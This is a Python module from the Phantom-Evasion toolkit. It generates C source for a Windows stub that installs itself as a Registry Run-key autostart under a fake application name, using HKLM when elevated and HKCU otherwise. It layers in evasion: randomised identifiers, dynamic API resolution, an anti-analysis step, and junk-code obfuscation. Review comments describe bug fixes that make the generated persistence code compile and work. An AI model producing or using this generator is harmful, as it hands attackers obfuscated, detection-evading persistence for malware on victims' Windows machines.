
     ########################################################################################
     #                                                                                      #
     #    This file is part of Phantom-Evasion.                                             #
     #                                                                                      #
     #    Phantom-Evasion is free software: you can redistribute it and/or modify           #
     #    it under the terms of the GNU General Public License as published by              #
     #    the Free Software Foundation, either version 3 of the License, or                 #
     #    (at your option) any later version.                                               #
     #                                                                                      #
     #    Phantom-Evasion is distributed in the hope that it will be useful,                #
     #    but WITHOUT ANY WARRANTY; without even the implied warranty of                    #
     #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the                     #
     #    GNU General Public License for more details.                                      #
     #                                                                                      #  
     #    You should have received a copy of the GNU General Public License                 #
     #   along with Phantom-Evasion.  If not, see <http://www.gnu.org/licenses/>.           #
     #                                                                                      #
     ########################################################################################

import sys 
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import JunkInjector
from usefull import WindowsDefend
from usefull import IncludeShuffler
from usefull import WindowsDecoyProc
from usefull import CloseDecoyProc
from usefull import WriteSource
 
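# The Run key path exactly as it has to appear inside a C string literal
# (each backslash doubled once for C, hence doubled twice in Python source).
_RUN_KEY_C = "Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"


def _reg_open_entry_point(ModOpt):
    """Return the C text that opens ``main()`` or ``DllMain()`` for ``ModOpt["Outformat"]``.

    For ``"exe"`` this is the ``main`` signature.  For ``"dll"`` the
    ReflectiveLoader header is included first when ``ModOpt["Reflective"] == True``,
    then ``DllMain`` and its ``DLL_PROCESS_ATTACH`` block are opened.  Any other
    Outformat yields an empty string (same as the original: no entry point at all).
    """
    outformat = ModOpt["Outformat"]
    if outformat == "exe":
        return "int main(int argc,char * argv[]){\n"
    if outformat == "dll":
        text = ""
        if ModOpt["Reflective"] == True:
            text += "#include \"ReflectiveLoader.h\"\n"
        text += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        text += "BOOL bReturnValue = TRUE;\n"
        text += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"
        return text
    return ""


def _reg_close_entry_point(ModOpt):
    """Return the C text that closes whatever ``_reg_open_entry_point`` opened."""
    outformat = ModOpt["Outformat"]
    if outformat == "exe":
        return "return 0;}"
    if outformat == "dll":
        # close DLL_PROCESS_ATTACH, then DllMain
        return "}\nreturn bReturnValue;}\n"
    return ""


def Persistence_C_REG_windows(ModOpt):
    """Write ``Source.c``: a Windows stub that installs a Registry Run-key autostart.

    The generated C code resolves the on-disk path of ``ModOpt["Binpath"]``
    (``LoadLibrary`` + ``GetModuleFileNameW``), wraps it as ``"<path>" `` and
    stores it as a ``REG_SZ`` value named ``ModOpt["Pname"]`` under
    ``Software\\Microsoft\\Windows\\CurrentVersion\\Run`` of
    ``HKEY_LOCAL_MACHINE`` when ``ModOpt["Priv"] == True`` (needs an elevated
    context) or ``HKEY_CURRENT_USER`` otherwise.  Run-key writes are a classic
    persistence location that defenders routinely watch (registry telemetry,
    Autoruns), so treat the resulting binary as noisy from a detection standpoint.

    ModOpt keys read:
        Binpath, Pname, Priv, Outformat ("exe" | "dll"), Reflective, DynImport,
        JI, JF, EF (the last three are passed straight to ``JunkInjector``).
    ModOpt keys written (only when ``DynImport == True``):
        NtdllHandle, Ker32Handle, AdvapiHandle -- the C identifiers of the
        module handles the generated code resolves APIs through.
    Returns ``None``; the only output is the file written by ``WriteSource``.

    Fixes relative to the original generator:
      * ``ModOpt["AdvapiHandle"]`` was read but never assigned (KeyError when
        DynImport is on); it is now generated like the other two handles.
      * the DynImport ``GetModuleFileNameW`` call referenced undefined Python
        names (``Randlpv``, ``Randbufname``, ``ModOpt["Bufflen"]``); it now
        takes the same arguments as the static-import branch.
      * the DynImport ``RegCloseKey`` pointer was declared inside the
        ``if (success)`` block but used after it, so the emitted C did not
        compile; the pointer is now resolved before the block.
      * the second, read-only ``RegOpenKeyExW`` handle was never closed.
    """
    FilePath = ModOpt["Binpath"]
    FakeAppname = ModOpt["Pname"]
    elevated = ModOpt["Priv"] == True
    dyn_import = ModOpt["DynImport"] == True
    root_key = "HKEY_LOCAL_MACHINE" if elevated else "HKEY_CURRENT_USER"

    # NOTE(review): FilePath and FakeAppname are pasted verbatim into C string
    # literals below; a backslash or double quote in either must already be
    # escaped by the caller -- TODO confirm where Binpath/Pname are sanitised.

    # Randomised C identifiers so no two builds share variable names.
    var_path = varname_creator()
    var_path2 = varname_creator()
    var_hkey = varname_creator()
    var_hkey2 = varname_creator()
    var_lresult = varname_creator()
    var_lresult2 = varname_creator()
    var_handle = varname_creator()
    var_value = varname_creator()
    var_success = varname_creator()
    var_success2 = varname_creator()
    var_dwsize = varname_creator()
    var_dwsize2 = varname_creator()
    var_count = varname_creator()
    var_regtype = varname_creator()

    include_list = [
        "#include <windows.h>\n",
        "#include <stdio.h>\n",
        "#include <string.h>\n",
        "#include <math.h>\n",
        "#include <time.h>\n",
    ]
    code = IncludeShuffler(include_list)
    code += _reg_open_entry_point(ModOpt)

    if dyn_import:
        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        # Assigned here like the other two; the original only read this key.
        ModOpt["AdvapiHandle"] = varname_creator()
        code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        code += "HANDLE " + ModOpt["AdvapiHandle"] + " = GetModuleHandle(\"advapi32.dll\");\n"
        advapi = ModOpt["AdvapiHandle"]
    else:
        advapi = None

    # Markers consumed by the later processing stages; keep them verbatim.
    code += "$:START\n"
    code += WindowsDefend(ModOpt)
    code += "$:EVA\n"

    # --- resolve the full path of the binary to register -------------------
    # Zero-initialised so a failed GetModuleFileNameW leaves an empty string
    # rather than uninitialised stack memory for the wcscat_s below.
    code += "wchar_t " + var_path + "[260] = {0};\n"
    # NOTE(review): for "dll" output this LoadLibrary runs inside
    # DLL_PROCESS_ATTACH (under the loader lock); Microsoft's DllMain guidance
    # warns against that -- confirm it is acceptable for the reflective case.
    code += "HMODULE " + var_handle + " = LoadLibrary(TEXT(\"" + FilePath + "\"));\n"
    if dyn_import:
        fn_gmfn = varname_creator()
        code += "FARPROC " + fn_gmfn + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"GetModuleFileNameW\");\n"
        code += fn_gmfn + "(" + var_handle + ", " + var_path + ", 260);\n"
    else:
        code += "GetModuleFileNameW(" + var_handle + ", " + var_path + ", 260);\n"

    # --- build the Run value: "<path>"  (quoted, trailing space) -----------
    code += "HKEY " + var_hkey + " = NULL;LONG " + var_lresult + " = 0;BOOL " + var_success + " = TRUE;\n"
    code += "DWORD " + var_dwsize + ";const size_t " + var_count + " = 260*2;\n"
    code += "wchar_t " + var_value + "[260*2] = {};\n"
    code += "wcscpy_s(" + var_value + ", " + var_count + ", L\"\\\"\");\n"
    code += "wcscat_s(" + var_value + ", " + var_count + ", " + var_path + ");\n"
    code += "wcscat_s(" + var_value + ", " + var_count + ", L\"\\\" \");\n"

    # --- create/open the Run key with write access -------------------------
    if dyn_import:
        fn_create = varname_creator()
        code += "FARPROC " + fn_create + " = GetProcAddress(" + advapi + ", \"RegCreateKeyExW\");\n"
    else:
        fn_create = "RegCreateKeyExW"
    code += (var_lresult + " = " + fn_create + "(" + root_key + ", L\"" + _RUN_KEY_C
             + "\", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &" + var_hkey + ", NULL);\n")

    # Resolve the set/close pointers *before* the if-block so the RegCloseKey
    # call after the block is in scope (the original declared them inside it).
    if dyn_import:
        fn_set = varname_creator()
        fn_close = varname_creator()
        code += "FARPROC " + fn_set + " = GetProcAddress(" + advapi + ", \"RegSetValueExW\");\n"
        code += "FARPROC " + fn_close + " = GetProcAddress(" + advapi + ", \"RegCloseKey\");\n"
    else:
        fn_set = "RegSetValueExW"
        fn_close = "RegCloseKey"

    # --- write the value, then always release the key handle ---------------
    code += var_success + " = (" + var_lresult + " == 0);\n"
    code += "if (" + var_success + "){\n"
    # byte size incl. the terminating NUL; sizeof(wchar_t) is 2 on Windows
    code += var_dwsize + " = (wcslen(" + var_value + ")+1)*2;\n"
    code += (var_lresult + " = " + fn_set + "(" + var_hkey + ",L\"" + FakeAppname
             + "\", 0, REG_SZ, (BYTE*)" + var_value + ", " + var_dwsize + ");")
    code += var_success + " = (" + var_lresult + " == 0);}\n"
    code += "if (" + var_hkey + " != NULL){" + fn_close + "(" + var_hkey + ");" + var_hkey + " = NULL;}\n"

    # --- second, read-only open of the same key ----------------------------
    # Kept from the original (it opens the key but never queries it); the
    # handle is now closed instead of being leaked.
    code += ("HKEY " + var_hkey2 + " = NULL;LONG " + var_lresult2 + " = 0;BOOL " + var_success2
             + " = TRUE;DWORD " + var_regtype + " = REG_SZ;\n")
    code += "wchar_t " + var_path2 + "[260]  = {};DWORD " + var_dwsize2 + " = sizeof(" + var_path2 + ");\n"
    if dyn_import:
        fn_open = varname_creator()
        code += "FARPROC " + fn_open + " = GetProcAddress(" + advapi + ", \"RegOpenKeyExW\");\n"
    else:
        fn_open = "RegOpenKeyExW"
    code += (var_lresult2 + " = " + fn_open + "(" + root_key + ", L\"" + _RUN_KEY_C
             + "\", 0, KEY_READ, &" + var_hkey2 + ");\n")
    code += "if (" + var_hkey2 + " != NULL){" + fn_close + "(" + var_hkey2 + ");" + var_hkey2 + " = NULL;}\n"

    code += "$:END\n"

    # Junk/obfuscation pass over everything emitted so far; the entry point is
    # closed afterwards so the injector never sees the closing braces.
    code = JunkInjector(code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"], False)
    code += _reg_close_entry_point(ModOpt)

    WriteSource("Source.c", code)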
